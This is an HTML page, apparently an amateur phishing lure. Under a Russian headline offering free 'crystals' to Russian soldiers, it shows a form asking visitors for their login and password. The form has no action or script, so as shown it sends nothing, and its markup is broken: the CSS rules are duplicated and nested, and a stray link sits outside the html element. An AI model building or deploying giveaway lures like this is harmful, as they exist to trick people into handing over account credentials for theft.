<!DOCTYPE html>
<a href="m.html">Textul pe care doriți să-l afișați ca link</a>
<html>
  <head>
    <title>Раздача кристалов Росийским Военным</title>
    <link rel="icon" type="image/png" href="favicon.ico">
    <style>
      body {
         background-image: url("R.jpg");
         background-size: cover;
      }
      h1 {
       text-align: center;
       font-size: 50px;
       color: #f0e130;
       animation: fade-in 2s;
       text-shadow: -1px 0 black, 0 1px black, 1px 0 black, 0 -1px black;

     }
     @keyframes fade-in {
        from { opacity: 0; }
        to { opacity: 1; }
      }
      /* Stilizare formular */
      form {
        margin-left: 13.5%;
        margin-top: 13%;
        background-color: #f0e130;
        border: 1px solid #ccc;
        padding: 20px;
        width: 300px;
        body {
           background-image: url("R.jpg");
           background-size: cover;
        }
        h1 {
         text-align: center;
         font-size: 50px;
         color: #f0e130;
         animation: fade-in 2s;
         text-shadow: -1px 0 black, 0 1px black, 1px 0 black, 0 -1px black;

       }
       @keyframes fade-in {
          from { opacity: 0; }
          to { opacity: 1; }
        }
        /* Stilizare formular */
        form {
          margin-left: 13.5%;
          margin-top: 13%;
          background-color: #f0e130;
          border: 1px solid #ccc;
          padding: 20px;
          width: 300px;
          box-shadow: 2px 2px 10px rgba(0, 0, 0, 0.5);

        }


      }

      /* Stilizare câmpuri de introducere */
      input[type=text] {
        width: 100%;
        padding: 12px 20px;
        margin: 8px 0;
        box-sizing: border-box;
        border: 2px solid #ccc;
        border-radius: 4px;
        background-color: #fff;
        font-size: 16px;
      }

      /* Stilizare buton de trimitere */
      input[type=submit] {
        background-color: #4CAF50;
        color: white;
        padding: 12px 20px;
        border: none;
        border-radius: 4px;
        cursor: pointer;
        font-size: 16px;
      }

      /* Stilizare buton de trimitere la hover */
      input[type=submit]:hover {
        background-color: #45a049;
      }

    </style>
  </head>
  <body>
    <h1>Раздача кристалов Росийским Военным</h1>

    <form>
      <label for="fname">Логин:</label>
      <input type="text" id="fname" name="fname" placeholder="Введите логин">

      <label for="lname">Пароль:</label>
      <input type="text" id="lname" name="lname" placeholder="Введите пароль">

      <input type="submit" value="Trimite">
    </form>
  </body>
</html>
